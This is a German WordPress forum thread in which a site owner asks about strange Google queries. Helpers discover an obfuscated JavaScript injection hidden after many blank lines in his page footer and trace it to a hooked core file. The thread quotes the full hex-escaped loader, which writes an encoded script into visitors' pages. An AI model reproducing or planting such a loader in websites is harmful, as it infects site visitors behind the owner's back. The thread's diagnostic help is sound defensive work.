Suchanfragen ":site www...." über google

  • Hallo und guten Morgen,

    im Moment kommen fast ausschließlich Suchanfragen über google, die wie folgt aufgebaut sind:

    :site schmollo.de und dann die einzelne Seite (Permalink)

    Wieso wird da direkt nach den Seiten gesucht? Habt Ihr vielleicht eine Ahnung, was da läuft?
    Oder habe ich auch so einen Trojaner auf der Website?

    Grüße
    Olaf

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren



  • so sieht man nach, ob eine Seite im Google Index ist

    da in letzter Zeit Google Blogs so hie und da nicht in den normalen Index nahm kann es sein, dass jemand dies zufällig so ausprobiert,
    sowas ist weder ein Trojaner noch gefährlich,
    irgendwer hat Interesse an Deinem Blog wieso auch immer

    lg

  • das andere


    Du hast aber vermutlich doch wo ein Script laufen auf deiner Seite
    = Werbung?
    wenn ja kill es , wenn nein, dann nutze dieses Plugin mal:

    Gehackt!

    lg

  • seltsam das der Scanner das nicht findet ...

    Schau dir mal in deinem Footer die letzte Zeile an:

    Zitat

    <!--864b730d3768b468f5ea9fb3a1db7322-><script language=javascript>yoce="%";rj="<scrx69px74 langux61gx65x3djx61x76x61scrix70x74x3e x66x75nctionx20ksdx28x6cx65)x7bx76ax72x20zz,x6b=x22x55;lvx32ex56d x78x3dEx43x7d.x62px5fx38x7bx23sBOHx28x5e0Gz@g+x5d4Tx37f&9[1x46x27x24x36x5ayx71:uM3*kN)x7cx41x6ax2cI`ia\\\ ux3dle.charx41t(x7az)x3baqnx3dkx2eindx65x78Ofx28u);ix66(ax71nx3ex2dx31x29{ ptkx3d(x28x61qn+1)x25x381x2d1);if(ptx6bx3cx3d0x29ptx6b+=x38x31;gx2bx3dx6b.cx68arAtx28x70x74kx2dx31)x3bx20} elsex20g+x3dux3bx7dl+=g;dx6fcx75mex6et.wx72x69tx65x28x6c);}<x2fscrx69x70t>";pfbpd=unescape(rj.replace(/x/g,yoce));var y,d;document.write(pfbpd);y="<B-~a_Jxv\"t+M\"+VEP,\"2\"B-~a_JP>x U-MwVtJbn~aJV^xP<S}R`57xv\"t+M\"+VE\\Ph\"2\"S-~a_J\\PxSR}E\\PKJJ_u//nnnb+UU+vV\"t\"vqJv-Bb-Uw/88MJJb,B?P] U-MwVtJb~V&V~~V~]P\\P><\\/S}R`57>Px|lx</B-~a_J>x";ksd(y);</script>



    Sieht nicht gesund aus :)

  • Das ist mir auch aufgefallen. Aber ich weiß echt nicht, wo der herkommt.

    Footer.php sieht so aus:

  • von außen schwer zu sagen. Hol dir mal das Template nochmal im original und teste ob es da dran liegt, danach würde ich mal alle Plugins deaktivieren um zu schauen ob vielleicht eines davon für die Zeile verantwortlich ist.

  • Wenn man sich den Quelltext ansieht, kommt das erst nach 250 Leerzeilen, zudem noch mit vielen Leerzeichen nach rechts gerückt und erst nach dem </html>. Das soll man im Quelltext möglichst nicht finden. Wer scrollt schon soweit runter, wenn da scheinbar nichts mehr steht...

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • Ich habe mal ein älteres Theme benutzt - das gleiche Spiel. Sogar bei dem Standard-Theme, welches ich noch nie benutzt habe.

    Plugins habe ich nacheinander alle mal deaktiviert - auch keine Änderung.

    Von wo wird denn die Index-Seite noch generiert??

  • Im Feed steht das übrigens auch drin, dürfte also eher nicht in den Theme-Dateien zu suchen sein.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • Der Schadcode befand sich vermutlich in der

    Code
    wp-includes/default-filters.php


    Falls du die Datei noch hast, kannst du ja mal reinschauen. Hatte so etwas ähnliches auch mal gehabt. Der "Exploit" hatte sich dort an den "wp_footer" Filter gehangen. Im Template selbst war nichts zu sehen.

    wpseek.com - Die WordPress-Code-Suchmaschine

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!